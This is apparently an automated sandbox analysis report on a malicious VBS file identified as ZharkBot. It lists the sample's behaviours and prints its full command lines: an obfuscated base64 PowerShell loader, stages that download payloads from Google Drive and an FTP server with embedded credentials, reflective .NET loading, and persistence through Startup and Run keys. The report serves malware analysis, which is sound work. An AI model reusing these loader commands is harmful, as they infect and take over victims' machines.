Analysis Overview
SHA256
596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23
Threat Level: Known bad
The file 596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs was found to be: Known bad.
Malicious Activity Summary
ZharkBot
Detects ZharkBot payload
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Indicator Removal: File Deletion
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-20 01:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-20 01:22
Reported
2024-09-20 01:24
Platform
win7-20240903-en
Max time kernel
121s
Max time network
128s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File opened for modification | C:\Windows\Logs\DPX\setupact.log | C:\Windows\system32\wusa.exe | N/A |
| File opened for modification | C:\Windows\Logs\DPX\setuperr.log | C:\Windows\system32\wusa.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革DEЌз革ZQB1Ќз革HIЌз革dЌз革Ќз革nЌз革CЌз革Ќз革LЌз革Ќз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革CЌз革Ќз革LЌз革Ќз革gЌз革CcЌз革aЌз革B0Ќз革HQЌз革cЌз革BzЌз革DoЌз革LwЌз革vЌз革G0Ќз革ZQBoЌз革HIЌз革ZQBlЌз革G4Ќз革YwByЌз革GUЌз革YQB0Ќз革GkЌз革bwBuЌз革C4Ќз革YwBvЌз革G0Ќз革LwBpЌз革G4Ќз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革WgBjЌз革EIЌз革YwBhЌз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BaЌз革GMЌз革QgBjЌз革GEЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HIЌз革dwBjЌз革GwЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgByЌз革HcЌз革YwBsЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革cgB3Ќз革GMЌз革bЌз革Ќз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革eЌз革BoЌз革EoЌз革SЌз革B5Ќз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAARgBkAE0AUQBUACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAARgBkAE0AUQBUACQAIAA7AA==';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs');powershell $IedxR
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lcwr.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $lcwr.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$lcwr.dispose();$lcwr = (New-Object Net.WebClient);$lcwr.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $lcwr.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\596a00476cdbd7a3f93ec08a71f1a356e4289da5017132ee631368d4b2251e23.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ni/moc.noitaercneerhem//:sptth' , $hzwje , 'true1' ) );};"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
C:\Windows\system32\wusa.exe
"C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
Network
Files
memory/2788-4-0x000007FEF577E000-0x000007FEF577F000-memory.dmp
memory/2788-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2788-7-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
memory/2788-6-0x0000000002790000-0x0000000002798000-memory.dmp
memory/2788-8-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
memory/2788-10-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
memory/2788-9-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
memory/2788-11-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bb5055a0f0520c5e3b6fbdae67780c32 |
| SHA1 | 649394614cd41d5f9173b70a3374c7f9eb8d9738 |
| SHA256 | a52ea7cb8cb985c1c5a1a66cc3537603ea7dbd57671632a161f7ee39d134d489 |
| SHA512 | 4a5bdf2b777dfb259a48d994877e092abf62fd0b3fb1da0905ea7ae4904c118df5a7617015dbda0990cc89ebecd760f7568d857bdb3133f203f9fe46a75841df |
memory/2788-29-0x000007FEF577E000-0x000007FEF577F000-memory.dmp
memory/2788-30-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-20 01:22
Reported
2024-09-20 01:24
Platform
win10v2004-20240802-en
Max time kernel
96s
Max time network
97s
Command Line
Signatures
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZharkBot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_z = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\qyxaz.ps1' \";exit" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 440 set thread context of 3188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
